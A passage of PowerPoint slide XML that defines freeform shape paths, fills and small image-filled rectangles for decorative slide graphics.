                  <a:pt x="534406" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581605" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628392" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674745" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720645" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766071" y="2060979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811004" y="2049549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855425" y="2036868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899312" y="2022957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942646" y="2007836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985408" y="1991524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027576" y="1974041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069132" y="1955408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110056" y="1935645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150327" y="1914770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189925" y="1892805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228831" y="1869768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1267025" y="1845681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304486" y="1820563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341196" y="1794433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377133" y="1767313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412278" y="1739221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446612" y="1710177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1480113" y="1680202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512763" y="1649316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544541" y="1617538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1575427" y="1584888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605402" y="1551387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634446" y="1517053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662538" y="1481908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689658" y="1445971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715788" y="1409261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740906" y="1371800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1764993" y="1333606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1788030" y="1294700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809995" y="1255102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830870" y="1214831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850633" y="1173907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869266" y="1132351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886749" y="1090183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903061" y="1047421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1918182" y="1004087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="960200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="915779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="870846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="825420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="779520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="733167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="686380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="639181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="591587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="543620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000250" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="446979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="399012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="351418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="304219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="257432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="211079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="165179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="119753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="74820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="30399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922457" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="80A2CA">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Freeform 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33274" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="2250"/>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8" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId5">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9" name="AutoShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId5">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0" name="AutoShape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId5">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1" name="Freeform 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="219075"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="2250"/>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2" name="Freeform 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="704850"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683"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3" name="Freeform 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="381000"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683"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4" name="Freeform 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="542925"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683"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5" name="Freeform 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9778" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33274" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="2250"/>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6" name="AutoShape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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7" name="AutoShape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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8" name="AutoShape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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9" name="Freeform 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9778" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33274" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="2250"/>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0" name="AutoShape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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1" name="AutoShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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2" name="AutoShape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId6">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3" name="Freeform 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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4" name="AutoShape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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5" name="AutoShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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6" name="AutoShape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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7" name="Freeform 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="219075"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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8" name="Freeform 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="70485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9" name="Freeform 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="38100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0" name="Freeform 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="542925"/>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1" name="Freeform 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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2" name="AutoShape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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3" name="AutoShape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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4" name="AutoShape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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5" name="Freeform 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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6" name="AutoShape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="704850"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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7" name="AutoShape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="381000"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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8" name="AutoShape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="542925"/>
            <a:ext cx="66675" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId7">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9" name="Freeform 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191875" y="3619500"/>
            <a:ext cx="1000125" cy="3238500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1000125" h="3238500">
                <a:moveTo>
                  <a:pt x="1000125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10223"/>
                </a:lnTo>
                <a:lnTo>
